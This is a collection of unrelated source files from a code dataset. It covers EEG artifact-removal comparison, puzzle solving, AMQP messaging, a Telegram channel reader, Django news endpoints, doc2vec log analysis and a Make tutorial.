logging.basicConfig(filename=os.path.join(Config.results_folder, '_output.log'), level=logging.DEBUG)\n if not os.path.exists(Config.results_folder):\n os.mkdir(Config.results_folder)\n else:\n logging.debug(\"will overwrite previous test\")\n # Load xdf and extract eeg stream\n logging.info(\"Load EEG files\")\n for k_file in range(len(Config.raw_files)):\n # LOAD DATA\n\n ## Load raw data\n raw_xdf_fname = Config.raw_files[k_file]\n streams, _ = load_xdf(raw_xdf_fname)\n stream_names = get_stream_names(streams)\n df_eeg_raw = extract_signal_stream(streams, 'Android_EEG_010026')\n df_presentation_events = extract_signal_stream(streams, 'Presentation_Markers')\n eeg_columns = ['Fp1', 'Fp2', 'Fz', 'F7', 'F8', 'FC1', 'FC2', 'Cz', 'C3', 'C4', 'T7',\n 'T8', 'CPz', 'CP1', 'CP2', 'CP5', 'CP6', 'Tp9', 'Tp10', 'Pz', 'P3',\n 'P4', 'O1', 'O2']\n df_eeg_raw = df_eeg_raw.loc[:, eeg_columns]\n bad_ch = []\n df_eeg_raw = float_index_to_time_index(df_eeg_raw)\n\n duration = (df_eeg_raw.index[-1] - df_eeg_raw.index[0]).total_seconds() / 60\n rate = estimate_rate(df_eeg_raw)\n test_configuration[test_ind][\"srate\"] = rate\n mne_eeg_raw, mene_event_id, mne_picks = pandas_to_mne(df_eeg_raw, rate=rate, bad_ch=bad_ch)\n mne_eeg_filtered_from_raw = mne_eeg_raw.copy().filter(1, 30)\n\n ## Load filtered data\n mne_eeg_filtered = read_raw_eeglab(Config.filtered_files[k_file])\n df_eeg_filtered = mne_eeg_filtered.to_data_frame()\n\n ## Load calibration data\n mne_eeg_calibration = read_raw_eeglab(Config.calibration_files[k_file])\n df_eeg_calibration = mne_eeg_calibration.to_data_frame()\n\n ## Load rASR output\n\n mne_eeg_rasr_matlab = read_raw_eeglab(Config.riemannian_asr_out_files[k_file])\n df_eeg_rasr_matlab = mne_eeg_rasr_matlab.to_data_frame()\n\n size = int(test_configuration[test_ind][\"srate\"]\n * test_configuration[test_ind][\"window_len\"]) # size of window in samples\n interval = int(size * (1 - test_configuration[test_ind][\"window_overlap\"])) # step interval in samples\n\n # convert filtered data into epochs\n np_eeg_filtered_epochs = epoch(df_eeg_filtered, size, size, axis=0) # (n_channels, n_times, n_trials)\n logging.info(\"shape test data\")\n logging.info(np_eeg_filtered_epochs.shape)\n # np_eeg_filtered_epochs = np.swapaxes(np_eeg_filtered_epochs, 0, 2 ) # (n_trials, n_channels, n_times)\n\n # convert calibration data into epochs\n np_eeg_calibration_epochs = epoch(df_eeg_calibration.values, size, interval,\n axis=0) # (n_channels, n_times, n_trials)\n # np_eeg_calibration_epochs = np.swapaxes(np_eeg_calibration_epochs, 0, 2 )# (n_trials, n_channels, n_times)\n logging.info(\"shape training data\")\n logging.info(np_eeg_calibration_epochs.shape)\n\n # %% md\n\n ## RASR IMPLEMENTATION\n\n X_fit = np_eeg_calibration_epochs\n X_test = np_eeg_filtered_epochs\n\n rASR_pipeline = make_pipeline(RASR(**check_params(RASR, **test_configuration[test_ind])))\n\n logging.info(\"Pipeline initialized\")\n start = timer()\n rASR_pipeline = rASR_pipeline.fit(X_fit)\n end = timer()\n print(f\"test_{test_ind}: Pipeline fitted in {end - start}s ({(end - start) / X_fit.shape[0]}s/epoch)\")\n\n X_test_transformed = np.zeros(X_test.shape)\n start = timer()\n time_table = - np.ones((X_test.shape[0], 1)) # initialize time table\n for n_epoch in range(X_test.shape[0]):\n start_in = timer()\n X_test_transformed[n_epoch, :, :] = rASR_pipeline.transform(X_test[[n_epoch], :, :])\n time_table[n_epoch] = timer() - start_in\n end = timer()\n print(f\"test_{test_ind}: Pipeline transform in {end - start}s ({(end - start) / X_fit.shape[0]}s/epoch)\")\n title = f\"s{k_file}_transform_computational_time\"\n plot_time_dist(time_table, output_folder=Config.results_folder, title=title)\n\n mne_eeg_rasr_info = mne_eeg_filtered.info\n data = X_test_transformed.reshape(X_test_transformed.shape[0] * X_test_transformed.shape[1], -1).transpose()\n mne_eeg_rasr_python = mne.io.RawArray(data * 1e-6, mne_eeg_rasr_info)\n\n # comparison\n title = f\"s{k_file}_filtered\"\n plot_all_mne_data(mne_eeg_filtered, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_matlab\"\n plot_all_mne_data(mne_eeg_rasr_matlab, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_matlab_diff\"\n eeg_rasr_matlab_diff = mne_eeg_filtered[:, 0:len(mne_eeg_rasr_matlab)][0] - mne_eeg_rasr_matlab.get_data()\n mne_eeg_rasr_diff = mne.io.RawArray(data=eeg_rasr_matlab_diff, info=mne_eeg_rasr_matlab.info, verbose=False)\n plot_all_mne_data(mne_eeg_rasr_diff, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_python\"\n plot_all_mne_data(mne_eeg_rasr_python, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_python_diff\"\n eeg_rasr_diff = mne_eeg_filtered[:, 0:len(mne_eeg_rasr_python)][0] - mne_eeg_rasr_python.get_data()\n mne_eeg_rasr_diff = mne.io.RawArray(data=eeg_rasr_diff, info=mne_eeg_filtered.info, verbose=False)\n plot_all_mne_data(mne_eeg_rasr_diff, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_matlab-python_diff\"\n max_samples = min(len(mne_eeg_rasr_matlab), len(mne_eeg_rasr_python)) - 1\n eeg_rasr_matlab_python_diff = np.sqrt((mne_eeg_rasr_matlab[:, 0:max_samples][0] -\n mne_eeg_rasr_python[:, 0:max_samples][0]) ** 2)\n mne_eeg_rasr_diff = mne.io.RawArray(data=eeg_rasr_matlab_python_diff, info=mne_eeg_rasr_matlab.info,\n verbose=False)\n plot_all_mne_data(mne_eeg_rasr_diff, Config.results_folder, title)\n\n # TODO: output more metrics for large scale analysis (e.g. parameters effect, etc.)\n","sub_path":"notebooks/script_RASR_comparison.py","file_name":"script_RASR_comparison.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"346937953","text":"\r\ninitial, final = [3, 3, 1], [0, 0, 0]\r\n\r\n\r\n\r\ndef check(current):\r\n if 0 <= current[0] <= 3 and 0 <= current[1] <= 3:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\ndef checkstate(current):\r\n rightside = [initial[i] - current[i] for i in range(3)]\r\n if current[1] > current[0] and current[0] != 0:\r\n x=0\r\n else:\r\n x=1\r\n if rightside[1] > rightside[0] and rightside[0] != 0:\r\n y=0\r\n else:\r\n y=1\r\n\r\n if x==1 and y==1:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef choose(current):\r\n actions = [[1, 0, 1], [0, 1, 1], [1, 1, 1], [2, 0, 1], [0, 2, 1]]\r\n moves = []\r\n for i in actions:\r\n if current[2] == 1:\r\n j= [current[x] - i[x] for x in range(3)]\r\n else:\r\n j= [current[x] + i[x] for x in range(3)]\r\n if check(j) and checkstate(j):\r\n moves.append(j)\r\n return moves\r\n\r\nans = []\r\n\r\ndef solution(nextstate, visited):\r\n visitedcopy = visited.copy()\r\n if nextstate == final:\r\n visitedcopy.append(nextstate)\r\n ans.append(visitedcopy)\r\n return\r\n elif nextstate in visited:\r\n return\r\n else:\r\n visitedcopy.append(nextstate)\r\n for i in choose(nextstate):\r\n solution(i, visitedcopy)\r\n\r\nsolution([3, 3, 1], [])\r\nprint(*ans, sep=\"\\n\")\r\n","sub_path":"Missionaries and Cannibals Problem.py","file_name":"Missionaries and Cannibals Problem.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"548622647","text":"# (C) 2018 OpenEye Scientific Software Inc. All rights reserved.\n#\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\nimport os\nimport json\nimport pytest\nfrom subprocess import check_output\n\nfrom artemis.wrappers import WorkFloeWrapper, DatasetWrapper, OutputDatasetWrapper\nfrom artemis.test import FloeTestCase\nfrom artemis.decorators import package\nfrom artemis.packaging import OrionTestPackage\n\nfrom openeye.oechem import oeifstream\nfrom datarecord import OEReadRecords\nfrom datarecord.utils import TemporaryPath\n\nimport am1bcc_charge\n\nPACKAGE_DIR = os.path.dirname(os.path.dirname(am1bcc_charge.__file__))\n\nFILE_DIR = os.path.join(PACKAGE_DIR, \"tests\", \"test_data\")\nFLOES_DIR = os.path.join(PACKAGE_DIR, \"floes\")\n\n\ntest_package = OrionTestPackage(manifest=dict(requirements=\"requirements.txt\"))\n# Add the contents of the regular package\ntest_package.add_directory(PACKAGE_DIR)\n# Remove the tests as have different requirements\ntest_package.remove_directory(\"tests/\")\n# Remove tasks.py as it requires invoke\ntest_package.remove_file(\"tasks.py\")\n\nwith TemporaryPath(suffix=\".txt\") as path:\n results = check_output([\"python\", \"setup.py\", \"--requires\"], cwd=PACKAGE_DIR)\n requirements = json.loads(results.decode())\n with open(path, \"w\") as ofs:\n for result in requirements:\n # Create a file with orion requirements\n ofs.write(\"{}\\n\".format(result))\n # Add the orion requirements requirements\n test_package.add_file(path, dest=\"requirements.txt\")\n\n\n@pytest.mark.floetest\n@package(test_package)\nclass TestReadWriteFloe(FloeTestCase):\n\n def test_simple_run(self):\n workfloe = WorkFloeWrapper.get_workfloe(\n os.path.join(FLOES_DIR, \"charge_floe.py\"),\n run_timeout=1200\n )\n input_file = DatasetWrapper.get_dataset(os.path.join(FILE_DIR, \"10.ism\"))\n output_file = OutputDatasetWrapper(extension=\".oedb\")\n workfloe.start(\n {\n \"promoted\": {\n \"in\": input_file.identifier,\n \"out\": output_file.identifier,\n }\n }\n )\n # Faked locally\n self.assertEqual(workfloe.state, \"complete\")\n # Also faked\n self.assertEqual(\n len(workfloe.reason),\n 0,\n \"Failed with reason {}\".format(workfloe.reason)\n )\n\n ifs = oeifstream()\n with open(output_file.path, \"rb\") as ifs:\n records = list(OEReadRecords(ifs))\n count = len(records)\n self.assertEqual(count, 10)\n","sub_path":"tests/floe_tests/test_myfloe.py","file_name":"test_myfloe.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"514283233","text":"import asyncio\n\nfrom simple_amqp import AmqpMsg, AmqpParameters\nfrom simple_amqp.asyncio import AsyncioAmqpConnection\n\n\nasync def consumer(msg: AmqpMsg):\n payload = msg.payload\n payload = payload.decode()\n print('msg received: {}'.format(payload))\n\n # acknowledge that the message was received correctly\n return True\n\n\nasync def main():\n conn = AsyncioAmqpConnection(AmqpParameters())\n channel = conn.channel()\n exchange = channel.exchange('events.exchange', type='topic')\n queue = channel.queue('events.queue')\n queue.bind(exchange, 'logs.topic')\n queue.consume(consumer)\n\n await conn.start()\n\n while True:\n # wait for messages\n await asyncio.sleep(1)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","sub_path":"examples/asyncio/simple_receiver.py","file_name":"simple_receiver.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114558513","text":"\"\"\"\n2. Написать программу сложения и умножения двух шестнадцатеричных чисел.\nПри этом каждое число представляется как массив, элементы которого это цифры\nчисла. Например, пользователь ввёл A2 и C4F. Сохранить их как [‘A’, ‘2’] и\n[‘C’, ‘4’, ‘F’] соответственно. Сумма чисел из примера: [‘C’, ‘F’, ‘1’],\nпроизведение - [‘7’, ‘C’, ‘9’, ‘F’, ‘E’].\n\"\"\"\nimport collections\nnumbers = collections.defaultdict(list)\nten_to_hex = [str(i) for i in range(10)] + ['A', 'B', 'C', 'D', 'E', 'F']\n\nfor i in range(2):\n numbers[i] = list(input('Введите число в шестнадцатеричном формате: ').upper())\n\nfirst = numbers[0]\nsecond = numbers[1]\n\nhex_sum = []\nhex_mult = []\nif len(first) > len(second):\n first, second = second, first\nfirst.reverse()\nsecond.reverse()\nk = 0\nfor i in range(len(first)):\n current = ten_to_hex.index(first[i]) + ten_to_hex.index(second[i]) + k\n hex_sum.append(ten_to_hex[current % 16])\n if ten_to_hex.index(first[i]) + ten_to_hex.index(second[i]) >= 15:\n k = 1\n else:\n k = 0\nif len(first) != len(second):\n current = ten_to_hex.index(second[-1]) + k\n hex_sum.append(ten_to_hex[current % 16])\nhex_sum.reverse()\nprint('Сумма:', hex_sum)\n\n","sub_path":"Lesson_5/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"295036567","text":"import os\nfrom core.utils import utils\nfrom telethon import TelegramClient\nfrom telethon.tl.types import MessageService\n\nfrom controllers.messages_controller import Messages\nfrom controllers.channels_controller import Channels\n\n\nclass GetChannels:\n\n def __init__(self, phone, client_session_name):\n self.phone = phone\n self.client_session_name = client_session_name\n print(\"Inicializando\")\n self.client = self.connect()\n self.messages_controller = Messages(self.client)\n self.channels_controller = Channels(\n client=self.client, phone=self.phone)\n\n\n def connect(self):\n api_id = int(os.getenv(\"API_ID\"))\n api_hash = os.getenv(\"API_HASH\")\n client = TelegramClient(self.client_session_name, api_id, api_hash)\n print(\"Conectando a cliente\")\n client_connected = client.start()\n\n while not client_connected:\n print(\"Client not conected\")\n client_connected = client.start()\n sleep(5)\n # import pdb\n # pdb.set_trace()\n # while not client.is_user_authorized():\n # print(\"Client is not authorized\")\n # phone_number = self.phone\n # print(\"Sending code\")\n # client.send_code_request(phone_number)\n \n # client.sign_in(phone_number, input('Enter code: '))\n \n return client\n\n def main(self):\n try:\n in_phone_channels = self.channels_controller.get_in_phone_channels()\n for channel in in_phone_channels:\n channel.messages_raw = self.channels_controller.get_channel_history(\n channel=channel)\n import pprint\n show = pprint.PrettyPrinter(indent=4).pprint\n import pdb\n pdb.set_trace()\n print(\"Hi\")\n except Exception as error:\n utils.print_exception()","sub_path":"process/get_channels.py","file_name":"get_channels.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"80290981","text":"\"\"\"\n创建时间 : 2018/06/04\n版本号 : V1\n文档名 : newspapers\n编辑人 : he_wm\n作 用 : 新闻板块接口\n源存储位置 : TmSccity_models\\api\\views\\course\\coursehost.py\n修改及增加功能记录 :\n 修改时间 : \n 1、2018/04/02:\n 2、\n 增加功能时间 :\n 1、\n 2、 \n\"\"\"\n\nfrom api.models import *\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet, ViewSetMixin\nfrom api.serializers.coursehost import *\nfrom api.views.auth.auth import TmAuth\n\n\nclass NewsPapers(ViewSetMixin, APIView):\n authentication_classes = [TmAuth, ]\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n 新闻主页显示\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n ret = {'code': 1000, 'data': None}\n try:\n queryset = Article.objects.all()\n ser = ArticleViewSetSerializers(instance=queryset, many=True)\n ret['data'] = ser.data\n except Exception as e:\n ret['code'] = 1001\n ret['error'] = '未获取到资源'\n return Response(ret)\n\n def retrieve(self, request, *args, **kwargs):\n ret = {'code': 1000, 'data': None}\n try:\n pk = kwargs.get('pk')\n obj = Article.objects.filter(pk=pk).first()\n ser = ArticleDetailViewSetSerializers(instance=obj, many=False)\n ret['data'] = ser.data\n except Exception as e:\n ret['code'] = 1001\n ret['error'] = '未获取到资源'\n return Response(ret)\n\n\nclass AgreeView(ViewSetMixin, APIView):\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n 点赞\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n ret = {'code': 1000, 'data': None}\n try:\n pk = kwargs.get('pk')\n # 方式一:更新赞数\n obj = Article.objects.filter(id=pk).first()\n obj.agree_num = obj.agree_num + 1\n obj.save()\n # 方式二:更新赞数\n # F,更新数据库字段\n # Q, 构造复杂条件\n # from django.db.models import F,Q\n # v = Article.objects.filter(id=pk).update(agree_num=F(\"agree_num\") + 1)\n # print(v)\n ret['data'] = obj.agree_num\n except Exception as e:\n ret['code'] = 1001\n ret['error'] = '点赞失败'\n return Response(ret)\n","sub_path":"api/views/course/newspapers.py","file_name":"newspapers.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118537508","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2005 Matthew Good \n# Copyright (C) 2015 Steffen Hoffmann \n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution.\n#\n# Author: Matthew Good \n\nimport sys\nimport unittest\n\n_twill_required = 'Twill>=2'\ntry:\n import twill\nexcept ImportError:\n twill = None\n INCLUDE_FUNCTIONAL_TESTS = False\nelse:\n # XXX Avoid tracenv log writing to stdout via twill.log\n if hasattr(twill, 'log') and hasattr(twill, 'handler'):\n twill.log.removeHandler(twill.handler)\n import pkg_resources\n try:\n pkg_resources.require(_twill_required)\n except:\n INCLUDE_FUNCTIONAL_TESTS = False\n twill = None\n else:\n INCLUDE_FUNCTIONAL_TESTS = True\n\n\ndef test_suite():\n from . import (admin, api, db, guard, htfile, model, pwhash, register,\n svnserve, util)\n from ..opt import tests as opt_tests\n\n suite = unittest.TestSuite()\n for mod in (admin, api, db, guard, htfile, model, pwhash, register,\n svnserve, util, opt_tests):\n suite.addTest(mod.test_suite())\n\n if INCLUDE_FUNCTIONAL_TESTS:\n from . import functional\n suite.addTest(functional.test_suite())\n elif not twill:\n sys.stderr.write('SKIP: functional tests (%s unavailable)\\n' %\n _twill_required)\n else:\n sys.stderr.write('SKIP: functional tests\\n')\n return suite\n\n\nif __name__ == '__main__':\n if '--skip-functional-tests' in sys.argv:\n sys.argv.remove('--skip-functional-tests')\n INCLUDE_FUNCTIONAL_TESTS = False\n unittest.main(defaultTest='test_suite')\n","sub_path":"acct_mgr/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523049455","text":"import gensim\nfrom os import listdir\nfrom nltk.tokenize import sent_tokenize\nfrom gensim.models import doc2vec\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport gensim\nfrom gensim.models.doc2vec import TaggedDocument\nfrom collections import namedtuple\nfrom smart_open import smart_open\nfrom gensim.models import Doc2Vec\nimport gensim.models.doc2vec\nfrom collections import OrderedDict\nimport multiprocessing\nimport numpy as np\n\n\n#Get all the ceph data from get API request from SWAGGER API\ndocs = [f for f in listdir('/home/sunagara/PycharmProjects/Build_Logs_Aggregation/Build-Logs-Aggregation/logs/') if f.endswith('.txt')]\nsent_tokenize_list = []\nfor doc in docs:\n with open('/home/sunagara/PycharmProjects/Build_Logs_Aggregation/Build-Logs-Aggregation/logs/'+doc)as data1:\n sent_tokenize_list.append(sent_tokenize(data1.read()))\nprint(sent_tokenize_list)\n#Pass a tokenized version of the log file to the model\n\nSentimentDocument = namedtuple('SentimentDocument', 'words tags split sentiment')\n\nalldocs = []\nwith smart_open('/home/sunagara/PycharmProjects/Build_Logs_Aggregation/Build-Logs-Aggregation/logs/log1.txt', 'rb', encoding='utf-8') as alldata:\n for line_no, line in enumerate(alldata):\n tokens = gensim.utils.to_unicode(line).split()\n words = tokens[1:]\n #split the data into training and testing\n tags = [line_no] # 'tags = [tokens[0]]' would also work at extra memory cost\n split = ['train', 'test', 'extra', 'extra'][line_no//25000] # 25k train, 25k test, 25k extra\n sentiment = [1.0, 0.0, 1.0, 0.0, None, None, None, None][line_no//12500] # [12.5K pos, 12.5K neg]*2 then unknown\n alldocs.append(SentimentDocument(words, tags, split, sentiment))\n\n#Train all the docs and label them\ntrain_docs = [doc for doc in alldocs if doc.split == 'train']\ntest_docs = [doc for doc in alldocs if doc.split == 'test']\n\nprint('%d docs: %d train-sentiment, %d test-sentiment' % (len(alldocs), len(train_docs), len(test_docs)))\n\n#Reducing CPU time by assigning these parameters to model training\ncores = multiprocessing.cpu_count()\nassert gensim.models.doc2vec.FAST_VERSION > -1, \"This will be painfully slow otherwise\"\n\n#Hyper tuning the models with different parameters and sending the train and test data to them for identifying if all combinations work to give accurate results\nsimple_models = [\n # PV-DBOW plain\n Doc2Vec(dm=0, vector_size=100, negative=5, hs=0, min_count=2, sample=0,\n epochs=20, workers=cores),\n # PV-DM w/ default averaging; a higher starting alpha may improve CBOW/PV-DM modes\n Doc2Vec(dm=1, vector_size=100, window=10, negative=5, hs=0, min_count=2, sample=0,\n epochs=20, workers=cores, alpha=0.05, comment='alpha=0.05'),\n # PV-DM w/ concatenation - big, slow, experimental mode\n # window=5 (both sides) approximates paper's apparent 10-word total window size\n Doc2Vec(dm=1, dm_concat=1, vector_size=100, window=5, negative=5, hs=0, min_count=2, sample=0,\n epochs=20, workers=cores),\n]\n\n#supply data to all the above models\nfor model in simple_models:\n model.build_vocab(alldocs)\n print(\"%s vocabulary scanned & state initialized\" % model)\n\nmodels_by_name = OrderedDict((str(model), model) for model in simple_models)\n\ndoc_id = np.random.randint(simple_models[0].docvecs.count) # Pick random doc; re-run cell for more examples\nprint('for doc %d...' % doc_id)\nfor model in simple_models:\n inferred_docvec = model.infer_vector(alldocs[doc_id].words)\n print('%s:\\n %s' % (model, model.docvecs.most_similar([inferred_docvec], topn=5)))\n\n#inferred doc2vec does more calculation on cosine similarity with distance and list top 5 anomalous data\n","sub_path":"Doc2Vecimplementation.py","file_name":"Doc2Vecimplementation.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66403723","text":"\n# coding: utf-8\n\n# ## Learning how to make a Makefile\n# \n# Adapted from [swcarpentry/make-novice repository](https://github.com/swcarpentry/make-novice).\n# \n# ### Make’s fundamental concepts are common across build tools.\n# \n# > [GNU Make](http://www.gnu.org/software/make/) is a free, fast, well-documented, and very popular Make implementation. From now on, we will focus on it, and when we say Make, we mean GNU Make.\n# \n# ### A tutorial named Makefiles—part 2 of the tutorial.\n# \n# Cells that follow are the result of following this [Makefiles tutorial](http://swcarpentry.github.io/make-novice/02-makefiles/).\n# \n# #### Other blog posts\n# \n# * [Tutorial begins: Introduction]({filename}./makefile_tutorial_0.ipynb)\n# \n# NB: I have adapted the tutorial so that the steps take place in this Jupyter notebook so that the notebook can be transpiled into a Pelican blog post using a [danielfrg/pelican-ipynb Pelican plugin](https://github.com/danielfrg/pelican-ipynb). Some of the code is what is necessary to display output in the notebook and therefore the blog post.\n\n# *Some Jupyter notebook housekeeping to set up some variables with path references.*\n\n# In[1]:\n\nimport os\n\n\n# In[150]:\n\nfrom IPython.core.display import Image, display\n\n\n# In[2]:\n\n(\n TAB_CHAR,\n) = (\n '\\t',\n)\n\n\n# In[3]:\n\nhome = os.path.expanduser('~')\n\n\n# *`repo_path` is the path to a clone of [swcarpentry/make-novice](https://github.com/swcarpentry/make-novice)*\n\n# In[4]:\n\nrepo_path = os.path.join(\n home, \n 'Dropbox/spikes/make-novice',\n)\n\n\n# In[5]:\n\nassert os.path.exists(repo_path)\n\n\n# *`paths` are the paths to child directories in a clone of [swcarpentry/make-novice](https://github.com/swcarpentry/make-novice)*\n\n# In[6]:\n\npaths = (\n 'code',\n 'data',\n)\npaths = (\n code,\n data,\n) = [os.path.join(repo_path, path) for path in paths]\nassert all(os.path.exists(path) for path in paths)\n\n\n# In[20]:\n\nformat_context = dict(zip(\n ('repo_path', 'data', 'code', 'tab',), \n (repo_path, data, code, TAB_CHAR))\n)\n\n\n# #### Begin tutorial.\n# \n# > Create a file, called Makefile, with the following content:\n\n# In[107]:\n\nmakefile_contents_0 = \"\"\"# Count words.\n{repo_path}/isles.dat : {data}/books/isles.txt\n{tab}python {code}/wordcount.py {data}/books/isles.txt {repo_path}/isles.dat\n\"\"\".format(**format_context)\n\n\n# *Using the shell to create Makefile with contents the value of Python variable `makefile_contents`.*\n\n# In[108]:\n\nget_ipython().system('printf \"$makefile_contents_0\" > Makefile')\n\n\n# > This is a build file, which for Make is called a Makefile - a file executed by Make. Note how it resembles one of the lines from our shell script.\n\n# ```bash\n# # Count words.\n# /home/dmmmd/Dropbox/spikes/make-novice/isles.dat : /home/dmmmd/Dropbox/spikes/make-novice/data/books/isles.txt\n# \tpython /home/dmmmd/Dropbox/spikes/make-novice/code/wordcount.py /home/dmmmd/Dropbox/spikes/make-novice/data/books/isles.txt /home/dmmmd/Dropbox/spikes/make-novice/isles.dat\n# ```\n\n# > Let us go through each line in turn:\n# \n# > * \\# denotes a comment. Any text from # to the end of the line is ignored by Make.\n# * isles.dat is a target, a file to be created, or built.\n# * books/isles.txt is a dependency, a file that is needed to build or update the target. Targets can have zero or more dependencies.\n# * A colon, :, separates targets from dependencies.\n# * python wordcount.py books/isles.txt isles.dat is an action, a command to run to build or update the target using the dependencies. Targets can have zero or more actions. These actions form a recipe to build the target from its dependencies and can be considered to be a shell script.\n# * Actions are indented using a single TAB character, not 8 spaces. This is a legacy of Make’s 1970’s origins. If the difference between spaces and a TAB character isn’t obvious in your editor, try moving your cursor from one side of the TAB to the other. It should jump four or more spaces.\n# * Together, the target, dependencies, and actions form a a rule.\n\n# > Let’s first sure we start from scratch and delete the .dat and .png files we created earlier\n\n# In[38]:\n\nget_ipython().system('rm $repo_path/*.dat $repo_path/*.png')\n\n\n# > By default, Make looks for a Makefile, called Makefile, and we can run Make as follows\n\n# In[39]:\n\nget_ipython().system('make')\n# By default, Make prints out the actions it executes:\n\n\n# > Let’s see if we got what we expected\n\n# In[40]:\n\nget_ipython().system('head -5 $repo_path/isles.dat')\n\n\n# > We don’t have to call our Makefile Makefile. However, if we call it something else we need to tell Make where to find it. This we can do using -f flag. For example, if our Makefile is named MyOtherMakefile:\n\n# In[109]:\n\nget_ipython().system('printf \"$makefile_contents_0\" > MyOtherMakeFile.mk')\n\n\n# In[110]:\n\nget_ipython().system('make -f MyOtherMakeFile.mk')\n\n\n# > This is because our target, isles.dat, has now been created, and Make will not create it again. To see how this works, let’s pretend to update one of the text files. Rather than opening the file in an editor, we can use the shell touch command to update its timestamp (which would happen if we did edit the file)\n\n# In[57]:\n\nget_ipython().system('touch $data/books/isles.txt')\n\n\n# > If we compare the timestamps of books/isles.txt and isles.dat,\n\n# In[58]:\n\nget_ipython().system('ls -l $data/books/isles.txt $repo_path/isles.dat')\n# then we see that isles.dat, the target, is now older thanbooks/isles.txt, its dependency\n\n\n# > If we run Make again,\n\n# In[59]:\n\nget_ipython().system('make')\n#then it recreates isles.dat\n\n\n# > When it is asked to build a target, Make checks the ‘last modification time’ of both the target and its dependencies. If any dependency has been updated since the target, then the actions are re-run to update the target. Using this approach, Make knows to only rebuild the files that, either directly or indirectly, depend on the file that changed. This is called an incremental build.\n\n# > up to date means that the Makefile has a rule for the file and the file is up to date whereas Nothing to be done means that the file exists but the Makefile has no rule for it.\n\n# In[61]:\n\nget_ipython().system('make $code/wordcount.py')\n\n\n# > By explicitly recording the inputs to and outputs from steps in our analysis and the dependencies between files, Makefiles act as a type of documentation, reducing the number of things we have to remember.\n\n# > Let’s add another rule to the end of Makefile:\n\n# In[113]:\n\nmakefile_contents_1 = \"\"\"\n{repo_path}/abyss.dat : {data}/books/abyss.txt\n{tab}python {code}/wordcount.py {data}/books/abyss.txt {repo_path}/abyss.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((makefile_contents_0, makefile_contents_1))\n\n\n# In[114]:\n\n# append makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# In[76]:\n\nget_ipython().system('make')\n\n\n# > Nothing happens because Make attempts to build the first target it finds in the Makefile, the default target, which is isles.dat which is already up-to-date. We need to explicitly tell Make we want to build abyss.dat:\n\n# In[79]:\n\nget_ipython().system('make $repo_path/abyss.dat')\n\n\n# > We may want to remove all our data files so we can explicitly recreate them all. We can introduce a new target, and associated rule, to do this. We will call it clean, as this is a common name for rules that delete auto-generated files, like our .dat files:\n\n# In[121]:\n\nmakefile_contents_2 = \"\"\"\n{repo_path}/clean:\n{tab}rm -f {repo_path}/*.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((makefile_contents_0, makefile_contents_1, makefile_contents_2))\n\n\n# In[122]:\n\n# add makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# > This is an example of a rule that has no dependencies. clean has no dependencies on any .dat file as it makes no sense to create these just to remove them. We just want to remove the data files whether or not they exist. If we run Make and specify this target,\n# \n# \n\n# In[123]:\n\nget_ipython().system('make clean')\n\n\n# *All .dat files are removed!*\n\n# > There is no actual thing built called clean. Rather, it is a short-hand that we can use to execute a useful sequence of actions. Such targets, though very useful, can lead to problems.\n# \n# > \n# \n# > For example, let us 